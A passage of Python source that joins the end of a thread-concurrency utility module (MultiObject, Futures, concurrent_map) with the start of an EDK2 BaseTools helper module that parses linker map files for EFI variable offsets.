bases = tuple(cls[base] for base in exception_type.__bases__ if base and issubclass(base, BaseException))
subtype = type("MultiException[%s]" % exception_type.__qualname__, bases, dict(COMMON_TYPE=exception_type))
cls._SUBTYPES[exception_type] = subtype
return subtype
__iter__ = None
def __call__(cls, exceptions, futures):
common_type = concestor(*map(type, filter(None, exceptions)))
subtype = cls[common_type]
return type.__call__(subtype, exceptions, futures)
PickledFuture = namedtuple("PickledFuture", "ctx, funcname")
class MultiException(PException, metaclass=MultiExceptionMeta):
"""
A ``MultiException`` subtype is raised when a ``MultiObject`` call fails in one or more of its threads.
The exception contains the following members:
:param actual: a MultiObject of all exceptions raised in the ``MultiObject`` call
:param count: the number of threads that raised an exception
:param invocations_count: the total number of calls the ``MultiObject`` made (the size of the ``MultiObject``)
:param common_type: the closest common ancestor (base-class) of all the exceptions
:param one: a sample exception (the first)
:param futures: a MultiObject of futures (:concurrent.futures.Future:) that were created in the ``MultiObject`` call
:param exceptions: a sparse list of exceptions corresponding to the MultiObject threads
:param complete: ``True`` if all threads failed on exception
"""
template = "{0.common_type.__qualname__} raised from concurrent invocation (x{0.count}/{0.invocations_count})"
def __reduce__(self):
return (MultiException, (self.exceptions, [PickledFuture(ctx=f.ctx, funcname=f.funcname) for f in self.futures]))
def __init__(self, exceptions, futures):
# we want to keep futures in parallel with exceptions,
# so some exceptions could be None
assert len(futures) == len(exceptions)
self.actual = MultiObject(filter(None, exceptions))
self.count = len(self.actual)
self.invocations_count = len(futures)
self.common_type = self.COMMON_TYPE
self.one = self.actual.T[0] if self.actual else None
self.futures = MultiObject(futures)
self.exceptions = exceptions
self.complete = self.count == self.invocations_count
if self.complete and hasattr(self.common_type, 'exit_with_code'):
self.exit_with_code = self.common_type.exit_with_code
super().__init__(self.template, self)
def __repr__(self):
return "{0.__class__.__name__}(x{0.count}/{0.invocations_count})".format(self)
def __str__(self):
return self.render(color=False)
def walk(self, skip_multi_exceptions=True):
if not skip_multi_exceptions:
yield self
for exc in self.actual:
if isinstance(exc, MultiException):
yield from exc.walk(skip_multi_exceptions=skip_multi_exceptions)
else:
yield exc
def render(self, *, width=80, color=True, **kw):
buff = self._get_buffer(color=color, **kw)
text = buff.render(width=width, edges=not color)
return colorize("\n" + text)
def _get_buffer(self, **kw):
if kw.get("color", True):
normalize_color = lambda x: x
else:
normalize_color = uncolored
def _format_context(context):
if not isinstance(context, dict):
return repr(context) # when it comes from rpyc
context = context.copy()
context.pop("indentation", None)
breadcrumbs = ";".join(context.pop('context', []))
return ", ".join(filter(None, chain((breadcrumbs,), ("%s=%s" % p for p in sorted(context.items())))))
buff = IndentableTextBuffer("{0.__class__.__qualname__}", self)
if self.message:
buff.write(normalize_color("WHITE<<%s>>" % self.message))
traceback_fmt = normalize_color("DARK_GRAY<<{}>>")
# workaround incompatibility with rpyc, which serializes .actual into a str
# instead of a list of exceptions. This makes the string flatten into a long
# and incomprehensible text buffer.
if hasattr(self, "_remote_tb"):
with buff.indent("Remote Traceback:"):
buff.write(self._remote_tb)
return buff
def add_details(exc):
if kw.get("timestamp", True) and getattr(exc, "timestamp", None):
ts = datetime.fromtimestamp(exc.timestamp).isoformat()
buff.write(normalize_color("MAGENTA<<Timestamp: %s>>" % ts))
if kw.get("context", True) and getattr(exc, "context", None):
buff.write("Context: %s" % _format_context(exc.context))
add_details(self)
for exc in self.actual:
with buff.indent("{.__class__.__qualname__}", exc):
if isinstance(exc, MultiException):
buff.extend(exc._get_buffer(**kw))
elif callable(getattr(exc, "render", None)):
buff.write(exc.render(**kw))
else:
buff.write("{}", exc)
add_details(exc)
if hasattr(exc, "__traceback__"):
show_traceback = getattr(exc, 'traceback', None)
if show_traceback is not False:
buff.write("Traceback:")
for line in format_tb(exc.__traceback__):
buff.write(traceback_fmt, line.rstrip())
return buff
def _submit_execution(executor, func, args, kwargs, ctx, funcname=None):
"""
This helper takes care of submitting a function for asynchronous execution, while wrapping and storing
useful information for tracing it in logs (for example, by ``Futures.dump_stacks``)
"""
future = executor.submit(_run_with_exception_logging, func, args, kwargs, ctx)
future.ctx = ctx
future.funcname = funcname or _get_func_name(func)
return future
class Futures(list):
"""
A collection of ``Future`` objects.
"""
def done(self):
"""
Return ``True`` if all futures are done
"""
return all(f.done() for f in self)
def cancelled(self):
"""
Return ``True`` if all futures are cancelled
"""
return all(f.cancelled() for f in self)
def running(self):
"""
Return ``True`` if all futures are running
"""
return all(f.running() for f in self)
def wait(self, timeout=None):
"""
Wait for all Futures to complete
"""
return futures_wait(self, timeout=timeout)
def result(self, timeout=None):
"""
Wait and return the results from all futures as an ordered list.
Raises a ``MultiException`` if one or more exceptions are raised.
"""
me = self.exception(timeout=timeout)
if me:
if isinstance(me, MultiException[ProcessExiting]):
# we want these aborted MultiObject threads to consolidate this exception
raise ProcessExiting()
raise me
return [f.result() for f in self]
def exception(self, timeout=None):
"""
Wait and return a ``MultiException`` if there are any exceptions, otherwise return ``None``.
"""
exceptions = [f.exception(timeout=timeout) for f in self]
if any(exceptions):
return MultiException(exceptions=exceptions, futures=self)
def cancel(self):
"""
Cancel all futures.
"""
cancelled = [f.cancel() for f in self] # list-comp, to ensure we call cancel on all futures
return all(cancelled)
def as_completed(self, timeout=None):
"""
Returns an iterator yielding the futures in order of completion.
Wraps `concurrent.futures.as_completed`.
"""
return as_completed(self, timeout=timeout)
@classmethod
@contextmanager
def execution(cls, workers=None, ctx={}):
"""
A context-manager for scheduling asynchronous executions and waiting on them upon exiting the context::
with Futures.execution() as futures:
for task in tasks:
futures.submit(task)
results = futures.result()
"""
if workers is None:
workers = MAX_THREAD_POOL_SIZE
class PooledFutures(cls):
killed = False
def submit(self, func, *args, log_ctx={}, **kwargs):
"Submit a new asynchronous task to this executor"
_ctx = dict(ctx, **log_ctx)
future = executor.submit(_run_with_exception_logging, func, args, kwargs, _ctx)
future.ctx = _ctx
future.funcname = _get_func_name(func)
self.append(future)
return future
def kill(self):
"Kill the executor and discard any running tasks"
self.cancel()
self.shutdown(wait=False)
while executor._threads:
thread = executor._threads.pop()
if getattr(thread, "_greenlet", None):
thread._greenlet.kill()
self.killed = True
def shutdown(self, *args, **kwargs):
executor.shutdown(*args, **kwargs)
with ThreadPoolExecutor(workers) as executor:
futures = PooledFutures()
try:
yield futures
except: # noqa
_logger.debug("shutting down ThreadPoolExecutor due to exception")
futures.kill()
raise
else:
if not futures.killed:
# force exceptions to bubble up
futures.result()
finally:
# break the cycle so that the GC doesn't clean up the executor under a lock (https://bugs.python.org/issue21009)
futures.kill = futures.shutdown = futures.submit = None
futures = None
executor = execution # for backwards compatibility
@classmethod
def dump_stacks(cls, futures, verbose=False):
"""
Logs the stack frame for each of the given futures.
The Future objects must have been submitted with ``_submit_execution`` so that they contain
the necessary information.
"""
frames = dict(iter_thread_frames())
for i, future in enumerate(futures, 1):
thread_ident = future.ctx['thread_ident']
try:
frame = frames[thread_ident]
except KeyError:
frame = None  # this might happen in race-conditions with a new thread starting
if not verbose or not frame:
if frame:
frame_line = _find_interesting_frame(frame)[:3]
location = " - %s:%s, in %s(..)" % tuple(frame_line)
else:
location = "..."
_logger.info("%3s - %s (DARK_YELLOW<<%s>>)%s",
i, future.funcname, cls._get_context(future), location)
continue
with _logger.indented("%3s - %s (%s)", i, future.funcname, cls._get_context(future), footer=False):
lines = format_thread_stack(frame, skip_modules=[this_module]).splitlines()
for line in lines:
_logger.info(line.strip())
@classmethod
def _get_context(cls, future: Future):
"""
Get interesting context information about this future object (as long as it was submitted by _submit_execution)
"""
def compacted(s):
return compact(str(s).split("\n", 1)[0], 20, "....", 5).strip()
ctx = dict(future.ctx)
context = []
threadname = ctx.pop("threadname", None)
thread_ident = ctx.pop("thread_ident", None)
context.append(threadname or thread_ident)
context.append(ctx.pop("context", None))
context.extend("%s=%s" % (k, compacted(v)) for k, v in sorted(ctx.items()))
return ";".join(filter(None, context))
def logged_wait(self, timeout=None, initial_log_interval=2 * MINUTE):
"""
Wait for all futures to complete, logging their status along the way.
Logging will occur at an ever-increasing log interval, beginning with ``initial_log_interval``,
and increasing 5-fold (x5) every 5 iterations.
"""
log_interval = initial_log_interval
global_timer = Timer(expiration=timeout)
iteration = 0
while not global_timer.expired:
completed, pending = self.wait(log_interval)
if not pending:
break
iteration += 1
if iteration % 5 == 0:
log_interval *= 5
with _logger.indented("(Waiting for %s on %s/%s tasks...)",
time_duration(global_timer.elapsed),
len(pending), sum(map(len, (completed, pending))),
level=logging.WARNING, footer=False):
self.dump_stacks(pending, verbose=global_timer.elapsed >= HOUR)
def _run_with_exception_logging(func, args, kwargs, ctx):
"""
Use as a wrapper for functions that run asynchronously, setting up a logging context and
recording the thread in which they are running, so that we can later log their progress
and identify the source of exceptions they raise. In addition, it stamps any exception
raised from the function with the current time.
"""
thread = threading.current_thread()
ctx.update(threadname=thread.name, thread_ident=thread.ident)
with _logger.context(**ctx):
try:
return func(*args, **kwargs)
except StopIteration:
# no need to log this
raise
except ProcessExiting as exc:
_logger.debug(exc)
raise
except Exception as exc:
_logger.silent_exception(
"Exception (%s) in thread running %s (traceback in debug logs)",
exc.__class__.__qualname__, func)
try:
exc.timestamp = time.time()
except: # noqa - sometimes exception objects are immutable
pass
raise
def _to_args_list(params):
"Helper for normalizing a list of parameters to be mapped on a function"
# We use type(args) == tuple because isinstance will return True for namedtuple
return [args if type(args) == tuple else (args,) for args in params]
def _get_func_name(func):
"Helper for finding an appropriate name for the given callable, handling ``partial`` objects."
kw = {}
while isinstance(func, partial):
if func.keywords:
kw.update(func.keywords)
func = func.func
funcname = func.__qualname__
if kw:
funcname += "(%s)" % ", ".join("%s=%r" % p for p in sorted(kw.items()))
return funcname
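# --- Illustrative sketch (not part of the original source): what _get_func_name returns
# for nested functools.partial objects. 'fetch' is a hypothetical callable.
#
#     from functools import partial
#
#     def fetch(url, timeout=None, verify=True):
#         ...
#
#     f = partial(partial(fetch, timeout=5), verify=False)
#     _get_func_name(f)   # -> "fetch(timeout=5, verify=False)"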
def _to_log_contexts(params, log_contexts):
"Helper for normalizing a list of parameters and log-contexts into a list of usable log context dicts"
if not log_contexts:
log_contexts = (dict(context=str(p) if len(p) > 1 else str(p[0])) for p in params)
else:
log_contexts = (p if isinstance(p, dict) else dict(context=str(p))
for p in log_contexts)
return log_contexts
@contextmanager
def asynchronous(func, params=None, workers=None, log_contexts=None, final_timeout=2.0, **kw):
"""
Map the list of tuple-parameters onto asynchronous calls to the specified function::
with asynchronous(connect, [(host1,), (host2,), (host3,)]) as futures:
...
connections = futures.result()
:param func: The callable to invoke asynchronously.
:param params: A list of tuples to map onto the function.
:param workers: The number of workers to use. Defaults to the number of items in ``params``.
:param log_contexts: An optional list of logging context objects, matching the items in ``params``.
:param final_timeout: The amount of time to allow for the futures to complete after exiting the asynchronous context.
"""
if params is None:
params = [()]
if not isinstance(params, list): # don't use listify - we want to listify tuples too
params = [params]
params = _to_args_list(params)
log_contexts = _to_log_contexts(params, log_contexts)
if workers is None:
workers = min(MAX_THREAD_POOL_SIZE, len(params))
try:
signature = inspect.signature(func)
except ValueError:
# In Python 3.5+, inspect.signature returns this for built-in types
pass
else:
if '_sync' in signature.parameters and '_sync' not in kw:
assert len(params) <= workers, 'SynchronizationCoordinator with %s tasks but only %s workers' % (len(params), workers)
synchronization_coordinator = SynchronizationCoordinator(len(params))
kw['_sync'] = synchronization_coordinator
func = synchronization_coordinator._abandon_when_done(func)
if not params:
# noop
yield Futures()
return
with Futures.executor(workers=workers) as futures:
for args, ctx in zip(params, log_contexts):
futures.submit(func, *args, log_ctx=ctx, **kw)
yield futures
def concurrent_find(func, params, **kw):
assert not DISABLE_CONCURRENCY, "concurrent_find runs only with concurrency enabled"
timeout = kw.pop("concurrent_timeout", None)
with asynchronous(func, list(params), **kw) as futures:
future = None
try:
for future in futures.as_completed(timeout=timeout):
if not future.exception() and future.result():
futures.kill()
return future.result()
else:
if future:
return future.result()
except FutureTimeoutError as exc:
if not timeout:
# ??
raise
futures.kill()
_logger.warning("Concurrent future timed out (%s)", exc)
def nonconcurrent_map(func, params, log_contexts=None, **kw):
futures = Futures()
log_contexts = _to_log_contexts(params, log_contexts)
has_exceptions = False
for args, ctx in zip(_to_args_list(params), log_contexts):
future = Future()
futures.append(future)
try:
result = _run_with_exception_logging(func, args, kw, ctx)
except Exception as exc:
has_exceptions = True
future.set_exception(exc)
else:
future.set_result(result)
if has_exceptions:
exceptions = [f.exception() for f in futures]
raise MultiException(exceptions=exceptions, futures=futures)
results = [f.result() for f in futures]
del futures[:]
return results
def concurrent_map(func, params, workers=None, log_contexts=None, initial_log_interval=None, **kw):
if DISABLE_CONCURRENCY or len(params) == 1:
return nonconcurrent_map(func, params, log_contexts, **kw)
with asynchronous(func, list(params), workers, log_contexts, **kw) as futures:
futures.logged_wait(initial_log_interval=initial_log_interval)
return futures.result()
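# --- Illustrative sketch (not part of the original source): concurrent_map applies the
# function to each parameter in its own worker and returns the results in input order.
# The callable and values are arbitrary examples.
#
#     squares = concurrent_map(lambda x: x * x, [1, 2, 3, 4], workers=2)
#     # -> [1, 4, 9, 16]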
# This metaclass helps generate MultiObject subtypes for specific object types
class MultiObjectMeta(type):
_SUBTYPES = {}
_SUBTYPES_LOCK = threading.RLock()
def __getitem__(cls, typ):
try:
return cls._SUBTYPES[typ]
except KeyError:
with cls._SUBTYPES_LOCK:
if typ in cls._SUBTYPES:
return cls._SUBTYPES[typ]
bases = tuple(cls[base] for base in typ.__bases__ if base) or (MultiObject, )
subtype = type("MultiObject[%s]" % typ.__qualname__, bases, dict(CONCESTOR=typ))
cls._SUBTYPES[typ] = subtype
return subtype
__iter__ = None
def __call__(cls, items=None, *args, **kwargs):
items = tuple(items if items else [])
common_type = concestor(*map(type, items))
if not issubclass(common_type, cls.CONCESTOR):
raise TypeError("%s is not a type of %s" % (common_type, cls.CONCESTOR))
subtype = cls[common_type]
return type.__call__(subtype, items, *args, **kwargs)
class MultiObject(object, metaclass=MultiObjectMeta):
CONCESTOR = object
def __init__(self, items=None, log_ctx=None, workers=None, initial_log_interval=None):
self._items = tuple(items) if items else ()
self._workers = workers
self._initial_log_interval = initial_log_interval
cstr = self.CONCESTOR
if hasattr(cstr, '_multiobject_log_ctx'):
# override the given log_ctx if the new items have it
# for some objects (Plumbum Cmd) even fetching the attribute is expensive, so we require it
# on the base class
self._log_ctx = tuple(item._multiobject_log_ctx for item in self._items)
elif callable(log_ctx):
self._log_ctx = tuple(map(log_ctx, self._items))
elif log_ctx:
self._log_ctx = tuple(log_ctx)
elif issubclass(cstr, str):
self._log_ctx = tuple(dict(context="%s" % item) for item in self._items)
else:
self._log_ctx = tuple(dict(context="%s<M%03d>" % (cstr.__name__, i)) for i, item in enumerate(self._items))
if self._workers is None and hasattr(cstr, '_multiobject_workers'):
_workers = cstr._multiobject_workers
if _workers == -1:
self._workers = len(self._items) or None
else:
self._workers = _workers
def __repr__(self):
return "<%s (x%s/%s)>" % (self.__class__.__name__, len(self), self._workers)
@property
def L(self):
return list(self._items)
@property
def T(self):
return self._items
@property
def C(self):
from .collections import ListCollection
return ListCollection(self)
def __getattr__(self, attr):
if attr.startswith("_"):
raise AttributeError()
get = lambda obj: getattr(obj, attr)
ret = concurrent_map(get, self, log_contexts=self._log_ctx, workers=self._workers)
return self._new(ret)
def __call__(self, *args, **kwargs):
if not self:
return self._new(self)
for obj in self:
if not callable(obj):
raise Exception("%s is not callable" % obj)
def do_it(obj, **more_kwargs):
more_kwargs.update(kwargs)
return obj(*args, **more_kwargs)
if all(hasattr(obj, "__qualname__") for obj in self):
do_it = wraps(obj)(do_it)
else:
common_typ = concestor(*map(type, self))
do_it.__qualname__ = common_typ.__qualname__
initial_log_interval = kwargs.pop("initial_log_interval", None)
ret = concurrent_map(
do_it, self,
log_contexts=self._log_ctx,
workers=self._workers,
initial_log_interval=initial_log_interval)
return self._new(ret)
def __dir__(self):
return sorted(set.intersection(*(set(dir(obj)) for obj in self)).union(super().__dir__()))
trait_names = __dir__
def __iter__(self):
return iter(self._items)
def __len__(self):
return len(self._items)
# ================
def __getitem__(self, key):
return self.call(lambda i: i[key])
def _new(self, items=None, ctxs=None, workers=None, initial_log_interval=None):
return MultiObject(
self._items if items is None else items,
self._log_ctx if ctxs is None else ctxs,
self._workers if workers is None else workers,
self._initial_log_interval if initial_log_interval is None else initial_log_interval)
def with_workers(self, workers):
"Return a new ``MultiObject`` based on current items with the specified number of workers"
return self._new(workers=workers)
def call(self, func, *args, **kw):
"Concurrently call a function on each of the object contained by this ``MultiObject`` (as first param)"
initial_log_interval = kw.pop("initial_log_interval", self._initial_log_interval)
if kw:
func = wraps(func)(partial(func, **kw))
params = [((item,) + args) for item in self] if args else self
return self._new(concurrent_map(
func, params,
log_contexts=self._log_ctx,
workers=self._workers,
initial_log_interval=initial_log_interval), initial_log_interval=initial_log_interval)
each = call
def filter(self, pred):
if not pred:
pred = bool
filtering = self.call(pred)
filtered = [t for (*t, passed) in zip(self, self._log_ctx, filtering) if passed]
return self._new(*(zip(*filtered) if filtered else ((), ())))
def chain(self):
"Chain the iterables contained by this ``MultiObject``"
return MultiObject(chain(*self))
def zip_with(self, *collections):
mo = self._new(zip(self, *collections))
assert len(mo) == len(self), "All collection must have at least %s items" % len(self)
return mo
def enumerate(self, start=0):
"""
Replaces this pattern, which loses the log contexts::
MultiObject(enumerate(items)).call(lambda idx, item: ...)
with this pattern, which retains log contexts::
MultiObject(items).enumerate().call(lambda idx, item: ...)
"""
return self._new(zip(range(start, start + len(self)), self))
def zip(self):
"Concurrently iterate through the iterables contained by this ``MultiObject``"
iters = list(map(iter, self))
while True:
try:
ret = concurrent_map(next, iters, log_contexts=self._log_ctx, workers=self._workers)
except MultiException as me:
if me.common_type == StopIteration and me.complete:
break
raise
else:
yield self._new(ret)
def concurrent_find(self, func=lambda f: f(), **kw):
return concurrent_find(func, self, log_contexts=self._log_ctx, workers=self._workers, **kw)
def __enter__(self):
return self.call(lambda obj: obj.__enter__())
def __exit__(self, *args):
self.call(lambda obj: obj.__exit__(*args))
def concestor(*cls_list):
"Closest common ancestor class"
mros = [list(inspect.getmro(cls)) for cls in cls_list]
track = defaultdict(int)
while mros:
for mro in mros:
cur = mro.pop(0)
track[cur] += 1
if track[cur] == len(cls_list):
return cur
if len(mro) == 0:
mros.remove(mro)
return object  # the base-class that rules them all
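# --- Illustrative sketch (not part of the original source): what concestor returns for
# a few simple cases (bool subclasses int, so their closest common ancestor is int).
#
#     concestor(bool, int)             # -> int
#     concestor(KeyError, ValueError)  # -> Exception
#     concestor(int, str)              # -> object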
class concurrent(object):
"""
Higher-level thread execution.
:param func: The callable to invoke asynchronously.
:param throw: When used as a context-manager, if an exception was thrown inside the thread, re-raise it to the calling thread upon exiting the context. (default: True)
:param daemon: Set the thread as daemon, so it does not block the process from exiting if it did not complete. (default: True)
:param threadname: Set a name for this thread. (default: ``anon-<id>``)
:param loop: If ``True``, repeatedly calls ``func`` until the context is exited, ``.stop()`` is called, or the ``stopper`` event object is set. (default: False)
:param sleep: Used with the ``loop`` flag - the number of seconds between consecutive calls to ``func``. (default: 1)
:param stopper: Used with the ``loop`` flag - an external ``threading.Event`` object to use for stopping the loop.
:param console_logging: If ``False``, suppress logging to the console log handler. (default: True)
Running multiple tasks side-by-side::
with \
concurrent(requests.get, "api.myserver.com/data1") as async1, \
concurrent(requests.get, "api.myserver.com/data2") as async2:
my_data = open("local_data").read()
remote_data1 = async1.result()
remote_data2 = async2.result()
process_it(my_data, remote_data1, remote_data2)
Run something repeatedly in the background:
heartbeats = concurrent(send_heartbeat, loop=True, sleep=5)
heartbeats.start() # until stopped, or the process exits
with concurrent(print_status, loop=True, sleep=5):
some_long_task()
heartbeats.stop()
"""
def __init__(self, func, *args, **kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
self.throw = kwargs.pop('throw', True)
self.daemon = kwargs.pop('daemon', True)
self.stopper = kwargs.pop('stopper', threading.Event())
self.sleep = kwargs.pop('sleep', 1)
self.loop = kwargs.pop('loop', False)
self.timer = None
self.console_logging = kwargs.pop('console_logging', True)
self.threadname = kwargs.pop('threadname', None)
if not self.threadname:
current_thread_name = threading.current_thread().name
if current_thread_name:
current_thread_name = current_thread_name.split('::')[0] # We want to see only the context
self.threadname = "%s::%X" % (current_thread_name, id(self))
else:
self.threadname = "anon-%X" % id(self)
real_thread_no_greenlet = kwargs.pop('real_thread_no_greenlet', False)
if IS_GEVENT:
# when the apply_gevent_patch function is in use, this option defers some jobs to real OS threads
self.real_thread_no_greenlet = real_thread_no_greenlet
else:
# gevent isn't active, no need to do anything special
self.real_thread_no_greenlet = False
rimt = kwargs.pop("raise_in_main_thread", False)
if rimt:
exc_type = Exception if rimt is True else rimt
self.func = raise_in_main_thread(exc_type)(self.func)
def __repr__(self):
flags = ""
if self.daemon:
flags += 'D'
if self.loop:
flags += 'L'
if self.real_thread_no_greenlet:
flags += 'T'
return "<%s[%s] '%s'>" % (self.__class__.__name__, self.threadname, flags)
def _logged_func(self):
stack = ExitStack()
self.exc = None
self.timer = Timer()
stack.callback(self.timer.stop)
stack.callback(self.stop)
try:
if not self.console_logging:
stack.enter_context(_logger.suppressed())
_logger.debug("%s - starting", self)
while True:
self._result = self.func(*self.args, **self.kwargs)
if not self.loop:
return
if self.wait(self.sleep):
_logger.debug("%s - stopped", self)
return
except ProcessExiting as exc:
_logger.debug(exc)
raise
except KeyboardInterrupt as exc:
_logger.silent_exception("KeyboardInterrupt in thread running %s:", self.func)
self.exc = apply_timestamp(exc)
if IS_GEVENT:
raise # in gevent we should let this exception propagate to the main greenlet
except Exception as exc:
_logger.silent_exception("Exception in thread running %s: %s (traceback can be found in debug-level logs)", self.func, type(exc))
self.exc = apply_timestamp(exc)
finally:
stack.close()
def stop(self):
_logger.debug("%s - stopping", self)
self.stopper.set()
def wait(self, timeout=None):
if self.real_thread_no_greenlet:
# we can't '.wait' on this gevent event object, so instead we test it and sleep manually:
timer = Timer(expiration=timeout)
while not timer.expired:
if self.stopper.is_set():
return True
non_gevent_sleep(0.1)
return False
return self.stopper.wait(timeout)
def result(self, timeout=None):
self.wait(timeout=timeout)
if self.throw and self.exc:
raise self.exc
return self._result
def done(self):
"""
Return ``True`` if the thread is done (successfully or not)
"""
return hasattr(self, '_result') or getattr(self, 'exc', None) is not None
@contextmanager
def paused(self):
self.stop()
yield
self.start()
@contextmanager
def _running(self):
if DISABLE_CONCURRENCY:
self._logged_func()
yield self
return
if self.real_thread_no_greenlet and IS_GEVENT:
_logger.debug('sending job to a real OS thread')
self._join = defer_to_thread(func=self._logged_func, threadname=self.threadname)
else:
# threading.Thread could be a real thread or a gevent-patched thread...
self.thread = threading.Thread(target=self._logged_func, name=self.threadname, daemon=self.daemon)
_logger.debug('sending job to %s', self.thread)
self.stopper.clear()
self.thread.start()
self._join = self.thread.join
try:
yield self
finally:
self.stop() # if we loop, stop it
self._join()
if self.throw and self.exc:
raise self.exc
def __enter__(self):
self._ctx = self._running()
return self._ctx.__enter__()
def __exit__(self, *args):
return self._ctx.__exit__(*args)
def __iter__(self):
# TODO: document or remove
with self:
self.iterations = 0
while not self.wait(self.sleep):
yield self
self.iterations += 1
start = __enter__
def join(self):
self.__exit__(None, None, None)
__del__ = join
# re-exports
from .sync import break_locks, TerminationSignal, initialize_exception_listener, initialize_termination_listener, Timebomb
from .sync import set_timebomb, TagAlongThread, SYNC, LoggedRLock, RWLock, SoftLock, skip_if_locked, with_my_lock
from .sync import synchronized, SynchronizedSingleton, LoggedCondition, _check_exiting
import sys
if sys.version_info < (3, 7):
# async became reserved in 3.7, but we'll keep it for backwards compatibility
code = compile("async = asynchronous", __name__, "exec")
eval(code, globals(), globals())
|
Misc.py
|
## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2019, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import absolute_import
import sys
import string
import threading
import time
import re
import pickle
import array
import shutil
import filecmp
from random import sample
from struct import pack
import uuid
import subprocess
import tempfile
from collections import OrderedDict
import Common.LongFilePathOs as os
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from Common.DataType import *
from Common.BuildToolError import *
from CommonDataClass.DataClass import *
from Common.Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import CopyLongFilePath as CopyLong
from Common.LongFilePathSupport import LongFilePath as LongFilePath
from Common.MultipleWorkspace import MultipleWorkspace as mws
from CommonDataClass.Exceptions import BadExpression
from Common.caching import cached_property
ArrayIndex = re.compile("\[\s*[0-9a-fA-FxX]*\s*\]")
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE | re.UNICODE)
## regular expressions for map file processing
startPatternGeneral = re.compile("^Start[' ']+Length[' ']+Name[' ']+Class")
addressPatternGeneral = re.compile("^Address[' ']+Publics by Value[' ']+Rva\+Base")
valuePatternGcc = re.compile('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$')
pcdPatternGcc = re.compile('^([\da-fA-Fx]+) +([\da-fA-Fx]+)')
secReGeneral = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
StructPattern = re.compile(r'[_a-zA-Z][0-9A-Za-z_]*$')
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
#
# If a module is built more than once with different PCDs or library classes,
# a temporary INF file with the same content is created; the temporary file is removed
# when the build exits.
#
_TempInfs = []
def GetVariableOffset(mapfilepath, efifilepath, varnames):
""" Parse map file to get variable offset in current EFI file
@param mapfilepath Map file absolution path
@param efifilepath: EFI binary file full path
@param varnames iteratable container whose elements are variable names to be searched
@return List whos elements are tuple with variable name and raw offset
"""
lines = []
try:
f = open(mapfilepath, 'r')
lines = f.readlines()
f.close()
except:
return None
if len(lines) == 0: return None
firstline = lines[0].strip()
if (firstline.startswith("Archive member included ") and
firstline.endswith(" file (symbol)")):
return _parseForGCC(lines, efifilepath, varnames)
if firstline.startswith("# Path:"):
return _parseForXcode(lines, efifilepath, varnames)
return _parseGeneral(lines, efifilepath, varnames)
def _parseForXcode(lines, efifilepath, varnames):
status = 0
ret = []
for line in lines:
line = line.strip()
if status == 0 and line == "# Symbols:":
status = 1
continue
if status == 1 and len(line) != 0:
for varname in varnames:
if varname in line:
# cannot pregenerate this RegEx since it uses varname from varnames.
m = re.match('^([\da-fA-FxX]+)([\s\S]*)([_]*%s)$' % varname, line)
if m is not None:
ret.append((varname, m.group(1)))
return ret
def _parseForGCC(lines, efifilepath, varnames):
""" Parse map file generated by GCC linker """
status = 0
sections = []
varoffset = []
for index, line in enumerate(lines):
line = line.strip()
# state machine transition
if status == 0 and line == "Memory Configuration":
status = 1
continue
elif status == 1 and line == 'Linker script and memory map':
status = 2
continue
elif status ==2 and line == 'START GROUP':
status = 3
continue
# status handler
if status == 3:
m = valuePatternGcc.match(line)
if m is not None:
sections.append(m.groups(0))
for varname in varnames:
Str = ''
m = re.match("^.data.(%s)" % varname, line)
if m is not None:
m = re.match(".data.(%s)$" % varname, line)
if m is not None:
Str = lines[index + 1]
else:
Str = line[len(".data.%s" % varname):]
if Str:
m = pcdPatternGcc.match(Str.strip())
if m is not None:
varoffset.append((varname, int(m.groups(0)[0], 16), int(sections[-1][1], 16), sections[-1][0]))
if not varoffset:
return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
#redirection
redirection = 0
for efisec in efisecs:
for section in sections:
if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
redirection = int(section[1], 16) - efisec[1]
ret = []
for var in varoffset:
for efisec in efisecs:
if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
return ret
def _parseGeneral(lines, efifilepath, varnames):
status = 0 #0 - beginning of file; 1 - PE section definition; 2 - symbol table
secs = [] # key = section name
varoffset = []
symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$-]+) +([\da-fA-F]+)', re.UNICODE)
for line in lines:
line = line.strip()
if startPatternGeneral.match(line):
status = 1
continue
if addressPatternGeneral.match(line):
status = 2
continue
if line.startswith("entry point at"):
status = 3
continue
if status == 1 and len(line) != 0:
m = secReGeneral.match(line)
assert m is not None, "Fail to parse the section in map file , line is %s" % line
sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
if status == 2 and len(line) != 0:
for varname in varnames:
m = symRe.match(line)
assert m is not None, "Fail to parse the symbol in map file, line is %s" % line
sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
sec_no = int(sec_no, 16)
sym_offset = int(sym_offset, 16)
vir_addr = int(vir_addr, 16)
# cannot pregenerate this RegEx since it uses varname from varnames.
m2 = re.match('^[_]*(%s)' % varname, sym_name)
if m2 is not None:
# found a binary PCD entry in the map file
for sec in secs:
if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
if not varoffset: return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
ret = []
for var in varoffset:
index = 0
for efisec in efisecs:
index = index + 1
if var[1].strip() == efisec[0].strip():
ret.append((var[0], hex(efisec[2] + var[2])))
elif var[4] == index:
ret.append((var[0], hex(efisec[2] + var[2])))
return ret
## Routine to process duplicated INF
#
